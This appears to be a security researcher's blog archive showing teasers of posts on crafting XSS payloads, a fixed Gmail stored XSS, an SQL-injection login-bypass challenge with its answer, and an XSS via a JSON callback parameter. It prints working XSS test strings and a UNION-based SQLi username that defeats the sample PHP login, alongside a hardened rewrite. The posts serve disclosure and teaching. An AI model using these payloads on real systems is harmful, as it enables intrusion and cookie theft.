Showing posts from April, 2014

Tailoring Custom Javascript Payloads for a successful XSS...

Hey Guys,

Today I would like to show you how I was able to create custom XSS payloads based on the JavaScript already present in various websites.

Note that this write-up does not show you how to get XSS in various websites; it covers various ways to create custom XSS payloads.

The approach I follow to create a successful XSS payload involves three steps.

1. Analyse the native code
2. Construct the correct syntax
3. Execute the payload

For explanation purposes I considered GET-based user input; however, this method also works with POST.

1. Analyse:
This stage involves analysing the code of the web page for which we are creating a payload. The main limitation at this stage is that the user input we enter must be reflected between script tags.
index.php?name=test should return the payload as follows.

If the user input is not rendered between <script> tags, then the following approach cannot be…

How I Got My First Bounty.. " A Tale of GMAIL Stored XSS "

Hey Guys,

I reported this bug a long time back and it is fixed now. Let's jump into the story.

In the Gmail settings General tab, there is an option for creating an automatic mail responder, in case we go on vacation and don't want to be disturbed. While going through Gmail, like everyone else, I also ignored that feature and tried here and there.
At the same time one of my good friends, @iampr3m, was also testing Gmail and trying hard to find something on the same settings page. However, he began his testing from the top, with the Signature feature. So I started testing the settings page from the bottom and got lucky, as the vacation responder is at the bottom of the page.
So, while testing, I observed that the vacation message is rendered inside a div tag. So as usual, I used a simple payload with an img tag ( <img src=a onerror=alert(1)> ) to test my luck. As soon as the payload was entered with < and >, the server invalidated the input and stripped the spec…

Simple Login Page Bypass..

Simple Login Page Bypass Using SQLi..

The following code is used in a login check page.

Find the proper credentials for getting a successful authentication alert.

// $sql is built from the submitted username earlier in the page (not shown in the post)
$result = mysql_query($sql);
if(mysql_num_rows($result) == 0){
    // no row came back for that username
    echo "<script>alert('failed')</script>";
} else {
    // take the first row and compare its columns by position
    $res = mysql_fetch_array($result);
    if($res[2]==$pwd&&((!$res[7])&&($res[3]))) {
        echo "<script>alert('success');</script>";
    } else {
        echo "<script>alert('failed');</script>";
    }
}


Or find the answers here:

username : ' UNION SELECT 'TEST','FOR','SQLI',1,'N','USER','NAME',0 -- -
password : SQLI
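The check above is bypassable because the username is concatenated into $sql, so a UNION can supply a row whose columns 2, 3 and 7 are whatever the attacker wants, and because column 2 is compared to the plaintext password. The following is an added, hardened rewrite of the same login check (my own example, not the post's code); the table and column names (users, password_hash, is_active, is_locked) are assumptions, and passwords are assumed to be stored with password_hash().

```php
<?php
// Hardened login check (added example). Assumed schema:
//   users(username, password_hash, is_active, is_locked)
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // errors throw instead of returning false

function check_login(mysqli $db, string $user, string $pwd): bool
{
    // The username is bound as a value and never becomes part of the SQL text,
    // so a UNION in $user cannot append an attacker-shaped row.
    $stmt = $db->prepare(
        'SELECT password_hash, is_active, is_locked FROM users WHERE username = ? LIMIT 1'
    );
    $stmt->bind_param('s', $user);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // Unknown user: verify against a throwaway hash anyway, so the response
    // time does not reveal whether the username exists. (A real deployment
    // would precompute this dummy hash once rather than per request.)
    $hash = $row['password_hash'] ?? password_hash('placeholder', PASSWORD_DEFAULT);
    $passwordOk = password_verify($pwd, $hash);

    // Account-state checks use columns selected by name, not positional
    // indexes, so they cannot be satisfied by a forged result row.
    return $row !== null
        && $passwordOk
        && (int) $row['is_active'] === 1
        && (int) $row['is_locked'] === 0;
}

// Connection parameters are placeholders for this example.
$db = new mysqli('localhost', 'app_user', 'app_password', 'appdb');
$db->set_charset('utf8mb4');

if (check_login($db, $_POST['username'] ?? '', $_POST['password'] ?? '')) {
    echo "<script>alert('success');</script>";
} else {
    echo "<script>alert('failed');</script>";
}
```

With this version the payload from the answer key is simply treated as a username that does not exist, and the password 'SQLI' fails password_verify().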

Cross Site Scripting through callback functionality

Hello Guys,
Today I would like to share a Cross Site Scripting vulnerability that existed in a JSON/AJAX callback functionality. I found this vulnerability a few days back, but as the bug is fixed now, I'd like to share the story.
The vulnerability existed in the forgot-password functionality, which uses an AJAX-based request/response mechanism within the login page. While testing the application, I observed that it uses a callback function to render the response into the page.

The name of this callback function is passed as a GET parameter. With a little analysis, I found that the callback parameter is vulnerable to Cross Site Scripting. So I extracted the forgot-password request and crafted a GET-based URL request with a simple XSS payload as the callback value:

<script>alert(document.cookie)</script><!--+

So I submitted th…